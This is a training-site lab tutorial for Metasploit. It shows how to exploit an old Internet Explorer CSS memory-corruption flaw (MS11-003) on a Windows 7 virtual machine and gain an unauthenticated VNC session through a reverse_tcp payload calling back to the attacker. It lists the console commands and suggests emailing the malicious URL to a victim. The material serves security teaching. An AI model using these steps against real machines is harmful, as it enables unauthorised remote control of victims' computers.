1
WWW.Prohackers.in
Lab-3
“Exploiting Client-Side
Vulnerabilities and
Establishing a VNC Session”
By:
-Vishal Kumar
(CEH, CHFI, CISE, MCP)
2
WWW.Prohackers.in
Table of content
1. Lab Scenario
2. Lab Objective
3. Lab Tasks
3.1 Task 01 :- Launch Metasploit Console
3.2 Task 02 : - Using Browser Exploit for Windows
3.3 Task 03 : - Setting Payload
3.4 Task 04 : - Setting LHOST and LPORT
3.4 Task 05 : - Running Exploit
3.6 Task 06 : - Remote View in Kali Linux
3
WWW.Prohackers.in
Task 01:- Launch Metasploit console.
● Start the Kali Linux and open the command terminal, and type the command
Msfconsole and press Enter, to launch the Metasploit console.
Tip: - Msfconsole can also be run from Application → Kali Linux → Top 10 Security tools →
metasploit framework.
Tip: - In the Metasploit framework, all modules are Ruby classes.
4
WWW.Prohackers.in ● The Metasploit console is launched on the Kali Linux machine, as shown in the below
screenshot.
Now, search for exploits in metasploit database for Privilege escalation, to search
exploit type search ms11 and press Enter. This command will display the available
exploit in the Metasploit Database.
5
WWW.Prohackers.in
Tip: - Msfconsole includes extensive regular-expression based search functionally. If you have a
general idea of what you are looking for you can search for via “search”
Task 02:- Using Browser Exploit for Windows.
● Type use exploit/windows/browser/ms11_003_ie_css_import and press Enter.
6
WWW.Prohackers.in Tip: - This module exploits memory corruption vulnerabilities within Microsoft\'s HTML engine
(mshtml).
When passing an HTML page containing a recursive CSS import, a C++ object is deleted and later
reused.
Task 03:- Setting Payload.
● Type set payload windows/vncinject/reverse_tcp and press Enter.
● To check the options available in this exploit, type show options and press Enter.
● In the following screenshot, we can see the LHOST is not set the LPORT in on
default port number. Now, we need to set the LHOST and LPORT.
Tip: - If you have selected a specific module, you can issue the „show options‟ command to display
which settings are available and/or required for the specific module.
7
WWW.Prohackers.in
Task 04:- Setting LHOST and LPORT.
● Type set LHOST [attacker machine IP address i.e. kali Linux IP address] and
press Enter.
● To set local port, type set LPORT 443 and presses Enter.
Now, verify the options which have set: type show options and press Enter. Now we have
set the Local Host (LHOST) and Local Port (LPORT).
Tip: - The „set‟ command allow you to configure Framework options and parameters for the current
module you are working with.
Task 05:- Running Exploit.
● Type exploits and presses Enter to run the exploit. This command provides you with
a Local IP URL, which can be sent to the Victim‟s machine through email or any
other source of communication.
8
WWW.Prohackers.in
● Now, switch to the Window 7 (virtual machine) and open the Internet Explorer;
then copy the Local IP URL that is: http://192.168.1.102:8080/FkEF1aT and
past is in the address bar and press Enter.
● Once you have clicked Enter, Internet Explorer displays a blank screen.
Tip: - Windows client side attack using a browser vulnerability and privilege escalation via task
scheduler exploit.
Task 06:- Remote view in Kali Linux.
● Switch to Kali Linux (attacker machine). You can see Remote Desktop windows with
the victim machine opened automatically in the TightVNC windows, as shown in the
following figure.
9
WWW.Prohackers.in
● Minimize the TightVNC remote window, and observe in Msfconsole that without any
authentication, we have successfully gained access to victim machine.
10
WWW.Prohackers.in
Tool/Utility Information Collected/Objectives Achieved
IP Address Range/target:- Windows 7
Metasploit machine
Framework Console Scan Result:-
(msfconsole) ● Remote Desktop without any Authentication.
Thanks for reading this presentation
Please give us your feedback at
Your feedback is most valuable for us for improving the presentation
You can also suggest the topic on which you want the presentation
Website: www.prohackers.in
FB page: www.facebook.com/theprohackers2017
Join FB Group: www.facebook.com/groups/group.prohackers/
Watch us on: www.youtube.com//channel/UCcyYSi1sh1SmyMlGfB-Vq6A
***Thanks***